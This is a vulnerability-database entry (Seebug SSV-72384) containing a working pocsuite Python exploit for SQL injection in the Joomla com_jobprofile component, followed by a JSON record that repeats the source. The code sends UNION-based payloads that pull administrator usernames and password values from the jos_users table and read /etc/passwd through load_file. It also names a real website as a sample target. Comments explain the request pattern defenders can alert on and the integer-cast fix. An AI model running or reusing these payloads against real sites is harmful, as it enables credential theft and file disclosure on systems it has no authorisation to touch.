ID SSV:72384
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00
Description
No description provided by source.
#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import re
class TestPOC(POCBase):
    """pocsuite POC for SSV-72384: SQL injection through the ``id`` parameter
    of the Joomla com_jobprofile component (``task=profilesview``).

    Both ``_verify`` and ``_attack`` issue a single GET whose ``id`` value is a
    UNION-based payload and then look for marker strings in the response body.
    For defenders, the request shape used here is the thing to alert on: a
    ``option=com_jobprofile`` request whose ``id`` is negative and carries
    ``union``/``select`` or ``load_file``. The underlying weakness is the
    component passing ``id`` into the query without validating it; casting it
    to an integer server-side is the fix described in the advisory text.

    NOTE(review): ``str.encode('hex')`` in ``_verify`` and the ``str``-vs-
    ``resp.content`` comparisons are Python 2 semantics; this POC will not run
    unmodified on Python 3.
    """
    vulID = '72384' # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2011-12-02'
    createDate = '2016-01-22'
    updateDate = '2016-01-22'
    references = ['http://www.seebug.org/vuldb/ssvid-72384']
    name = 'Joomla Jobprofile Component (com_jobprofile) - SQL Injection'
    appPowerLink = 'http://www.thakkertech.com/products/joomla-extensions/components/jobprofile-joomla-component-detail.html'
    appName = 'Joomla Jobprofile Component'
    appVersion = 'N/A'
    vulType = 'SQL Injection'
    # Advisory text (runtime string; continuation lines deliberately left at
    # column 0 so the literal's content is unchanged).
    desc = '''
Joomla Jobprofile 组件 index.php 的参数id由于过滤不严,导致出现SQL注入漏洞。
远程攻击者可以利用该漏洞执行SQL指令。
利用该漏洞计算md5(1)的POC格式如下:
http://XXX.com/index.php?option=com_jobprofile&Itemid=61&task=profilesview
&id=-1+union+all+select+1,md5(1),3,4,5,6,7,8,9--
下面的将分别利用注入漏洞读取joomla管理员口令密码,以及读取/etc/passwd文件的内容。
'''
    samples = ['http://www.astellas.cz']

    def _attack(self):
        """Read a row of the Joomla users table through the injection.

        Returns the pocsuite ``Output`` built by ``parse_output``; the result
        dict carries ``AdminInfo.Username`` / ``AdminInfo.Password`` only when
        both marker-delimited fields were found in the response.
        """
        result = {}
        # Vulnerable endpoint; the payload is appended straight after ``id=``.
        # ``Itemid=61`` and the ``jos_`` table prefix are hard-coded, so a site
        # with a different menu id or prefix will not match — presumably the
        # defaults of the era, TODO confirm.
        exploit='/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id='
        # UNION-based payload. The hex literals are delimiters the regex below
        # keys on: 0x247e7e7e24 is '$~~~$' and 0x2a2a2a is '***'.
        payload="-1+union+all+select+1,concat(0x247e7e7e24,username,0x2a2a2a,password"\
            ",0x247e7e7e24),3,4,5,6,7,8,9+from+jos_users--"
        # Full request URL: target base URL + endpoint + payload.
        vulurl=self.url+exploit+payload
        # Browser-like request headers.
        httphead = {
            'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
            'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Connection':'keep-alive'
        }
        # Pattern that pulls the two fields out from between the markers.
        # Not a raw string: ``\$`` and ``\*`` are not recognised escapes, so
        # they survive literally (Python 3.12+ warns about this).
        parttern='\$~~~\$(.*)\*\*\*(.*)\$~~~\$'
        # Send the request.
        resp=req.get(url=vulurl,headers=httphead,timeout=50)
        # Cheap substring pre-check for the start marker before running the regex.
        if '$~~~$' in resp.content:
            # Extract the two captured fields.
            match=re.search(parttern,resp.content,re.M|re.I)
            if match:
                # Injection succeeded: the markers framed real column data.
                result['AdminInfo']={}
                # ``username`` column value as echoed by the server.
                result['AdminInfo']['Username']=match.group(1)
                # ``password`` column value as echoed by the server (whatever
                # the users table stores; presumably a hash, not verified here).
                result['AdminInfo']['Password']=match.group(2)
        return self.parse_output(result)

    def _verify(self):
        """Confirm the injection by having the database read ``/etc/passwd``.

        Returns the pocsuite ``Output`` built by ``parse_output``; on success
        the result dict carries ``VerifyInfo`` (URL and payload used) and
        ``Fileinfo`` (file name and the matched ``root:`` line).
        """
        result = {}
        # File to read as evidence of a working injection.
        filename='/etc/passwd'
        # Hex-encode the path so the payload carries no quote characters.
        # ``str.encode('hex')`` exists only on Python 2.
        hexfilename='0x'+filename.encode('hex')
        # Vulnerable endpoint; the payload is appended straight after ``id=``.
        exploit='/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id='
        # UNION-based payload using the database's ``load_file()`` in the
        # second column, which is the one the page echoes back.
        payload="-1+union+all+select+1,load_file("+hexfilename+"),3,4,5,6,7,8,9+from+jos_users--"
        # Full request URL: target base URL + endpoint + payload.
        vulurl=self.url+exploit+payload
        # Browser-like request headers.
        httphead = {
            'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
            'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Connection':'keep-alive'
        }
        # Send the request.
        resp=req.get(url=vulurl,headers=httphead,timeout=50)
        # Only a 200 response is inspected.
        if resp.status_code==200:
            # A ``root:...:0:0:...`` passwd-style line is taken as proof the
            # file was read; anything else counts as a failed verification.
            match=re.search('root:.+?:0:0:.+?:.+?:.+?', resp.content,re.I|re.M)
            # File read succeeded.
            if match:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url+exploit
                result['VerifyInfo']['Payload'] = payload
                # Record the evidence: only the first matched line, truncated.
                result['Fileinfo']={}
                result['Fileinfo']['Filename']=filename
                result['Fileinfo']['Content']=match.group(0)+'...'
        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap ``result`` in a pocsuite ``Output``.

        A non-empty dict is reported via ``output.success``; an empty one via
        ``output.fail`` with a fixed message.
        """
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output
# Hand the POC class to pocsuite's registry (``register`` is imported from
# pocsuite.utils at the top of the file).
register(TestPOC)
{"lastseen": "2017-11-19T16:28:40", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "_object_type": "robots.models.seebug.SeebugBulletin", "status": "poc", "enchantments": {"score": {"value": 0.4, "vector": "NONE", "modified": "2017-11-19T16:28:40"}, "dependencies": {"references": [], "modified": "2017-11-19T16:28:40"}, "vulnersScore": 0.4}, "href": "https://www.seebug.org/vuldb/ssvid-72384", "references": [], "history": [], "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "id": "SSV:72384", "title": "Joomla Jobprofile Component (com_jobprofile) - SQL Injection", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 3, "sourceData": "\n #!/usr/bin/env python\r\n# coding: utf-8\r\nfrom pocsuite.net import req\r\nfrom pocsuite.poc import POCBase, Output\r\nfrom pocsuite.utils import register\r\nimport re\r\n\r\nclass TestPOC(POCBase):\r\n vulID = '72384' # ssvid\r\n version = '1.0'\r\n author = ['kikay']\r\n vulDate = '2011-12-02'\r\n createDate = '2016-01-22'\r\n updateDate = '2016-01-22'\r\n references = ['http://www.seebug.org/vuldb/ssvid-72384']\r\n name = 'Joomla Jobprofile Component (com_jobprofile) - SQL Injection'\r\n appPowerLink = 'http://www.thakkertech.com/products/joomla-extensions/components/jobprofile-joomla-component-detail.html'\r\n appName = 'Joomla Jobprofile Component'\r\n appVersion = 'N/A'\r\n vulType = 'SQL Injection'\r\n desc = '''\r\n Joomla Jobprofile \u7ec4\u4ef6 index.php \u7684\u53c2\u6570id\u7531\u4e8e\u8fc7\u6ee4\u4e0d\u4e25\uff0c\u5bfc\u81f4\u51fa\u73b0SQL\u6ce8\u5165\u6f0f\u6d1e\u3002\r\n \u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u8be5\u6f0f\u6d1e\u6267\u884cSQL\u6307\u4ee4\u3002\r\n\r\n \u5229\u7528\u8be5\u6f0f\u6d1e\u8ba1\u7b97md5(1)\u7684POC\u683c\u5f0f\u5982\u4e0b\uff1a\r\n\r\n 
http://XXX.com/index.php?option=com_jobprofile&Itemid=61&task=profilesview\r\n &id=-1+union+all+select+1,md5(1),3,4,5,6,7,8,9--\r\n\r\n \u4e0b\u9762\u7684\u5c06\u5206\u522b\u5229\u7528\u6ce8\u5165\u6f0f\u6d1e\u8bfb\u53d6joomla\u7ba1\u7406\u5458\u53e3\u4ee4\u5bc6\u7801\uff0c\u4ee5\u53ca\u8bfb\u53d6/etc/passwd\u6587\u4ef6\u7684\u5185\u5bb9\u3002\r\n '''\r\n samples = ['http://www.astellas.cz']\r\n\r\n def _attack(self):\r\n #\u5229\u7528SQL\u6ce8\u5165\u8bfb\u53d6joomla\u7ba1\u7406\u5458\u4fe1\u606f\r\n result = {}\r\n #\u8bbf\u95ee\u7684\u5730\u5740\r\n exploit='/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id='\r\n #\u5229\u7528Union\u65b9\u5f0f\u8bfb\u53d6\u4fe1\u606f\r\n payload=\"-1+union+all+select+1,concat(0x247e7e7e24,username,0x2a2a2a,password\"\\\r\n \",0x247e7e7e24),3,4,5,6,7,8,9+from+jos_users--\"\r\n #\u6784\u9020\u6f0f\u6d1e\u5229\u7528\u8fde\u63a5\r\n vulurl=self.url+exploit+payload\r\n #\u81ea\u5b9a\u4e49\u7684HTTP\u5934\r\n httphead = {\r\n 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',\r\n 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\r\n 'Connection':'keep-alive'\r\n }\r\n #\u63d0\u53d6\u4fe1\u606f\u7684\u6b63\u5219\u8868\u8fbe\u5f0f\r\n parttern='\\$~~~\\$(.*)\\*\\*\\*(.*)\\$~~~\\$'\r\n #\u53d1\u9001\u8bf7\u6c42\r\n resp=req.get(url=vulurl,headers=httphead,timeout=50)\r\n #\u68c0\u67e5\u662f\u5426\u542b\u6709\u7279\u5f81\u5b57\u7b26\u4e32\r\n if '$~~~$' in resp.content:\r\n #\u63d0\u53d6\u4fe1\u606f\r\n match=re.search(parttern,resp.content,re.M|re.I)\r\n if match:\r\n #\u6f0f\u6d1e\u5229\u7528\u6210\u529f\r\n result['AdminInfo']={}\r\n #\u7528\u6237\u540d\r\n result['AdminInfo']['Username']=match.group(1)\r\n #\u5bc6\u7801\r\n result['AdminInfo']['Password']=match.group(2)\r\n return self.parse_output(result)\r\n\r\n def _verify(self):\r\n #\u5229\u7528\u6ce8\u5165\u6f0f\u6d1e\u8bfb\u53d6/etc/passwd\u7684\u6587\u4ef6\u5185\u5bb9\r\n result = {}\r\n 
#\u6587\u4ef6\u540d\u79f0\r\n filename='/etc/passwd'\r\n #\u8fdb\u884c16\u8fdb\u5236\u7f16\u7801\r\n hexfilename='0x'+filename.encode('hex')\r\n #\u8bbf\u95ee\u7684\u5730\u5740\r\n exploit='/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id='\r\n #\u5229\u7528Union\u65b9\u5f0f\u8bfb\u53d6\u4fe1\u606f\r\n payload=\"-1+union+all+select+1,load_file(\"+hexfilename+\"),3,4,5,6,7,8,9+from+jos_users--\"\r\n #\u6784\u9020\u6f0f\u6d1e\u5229\u7528\u8fde\u63a5\r\n vulurl=self.url+exploit+payload\r\n #\u81ea\u5b9a\u4e49\u7684HTTP\u5934\r\n httphead = {\r\n 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',\r\n 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\r\n 'Connection':'keep-alive'\r\n }\r\n #\u53d1\u9001\u8bf7\u6c42\r\n resp=req.get(url=vulurl,headers=httphead,timeout=50)\r\n #\u5224\u65ad\u8fd4\u56de\u7ed3\u679c\r\n if resp.status_code==200:\r\n match=re.search('root:.+?:0:0:.+?:.+?:.+?', resp.content,re.I|re.M)\r\n #\u8bfb\u53d6\u6587\u4ef6\u6210\u529f\r\n if match:\r\n result['VerifyInfo'] = {}\r\n result['VerifyInfo']['URL'] = self.url+exploit\r\n result['VerifyInfo']['Payload'] = payload\r\n #\u8bb0\u5f55\u6587\u4ef6\u5185\u5bb9\r\n result['Fileinfo']={}\r\n result['Fileinfo']['Filename']=filename\r\n result['Fileinfo']['Content']=match.group(0)+'...'\r\n return self.parse_output(result)\r\n\r\n def parse_output(self, result):\r\n #parse output\r\n output = Output(self)\r\n if result:\r\n output.success(result)\r\n else:\r\n output.fail('Internet nothing returned')\r\n return output\r\n\r\n\r\nregister(TestPOC)\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-72384", "type": "seebug", "objectVersion": "1.4"}
{}